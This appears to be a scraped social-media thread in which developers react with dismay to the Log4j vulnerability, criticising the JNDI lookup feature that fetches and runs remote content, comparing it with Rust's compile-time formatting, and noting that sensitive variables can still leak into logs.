reading about the log4j vulnerability, and... why. why does a logging system have a thing that fetches a url and executes the response. why does this exist
Conversation
I'd been assuming it must be some sort of memory or privilege exploit (cue people going "see even memory safe languages are bad") but it's completely unrelated to memory. it's that log4j uses jndi which has an extremely dangerous feature built into it
2
107
strings are so bad. you know one thing that's really good about rust? signal vs formatting is parsed out of println! _at compile time_ so you can't confuse it by putting control sequences in data
3
1
133
I'm used to thinking "you might need to shell-escape log data to get rid of formatting codes" but log4j just _downloads urls and executes the response_ as a deliberate feature?
2
5
113
Replying to
It also interprets them in the strings being passed as parameters rather than only the main format string itself. It's not even avoidable by avoiding passing attacker controlled format strings. They're trying to put a bandaid on a fundamentally broken and horrifying design.
I am honestly amazed that each time I read something new about this issue somehow makes it worse.
1
3
Saw that here and confirmed it:
news.ycombinator.com/item?id=295063
It's unfortunately for the course for anything with the Apache brand.
It's still problematic even with the vulnerability fixed because you can leak sensitive variables to logs which aren't supposed to end up in the logs.
1
4
Show replies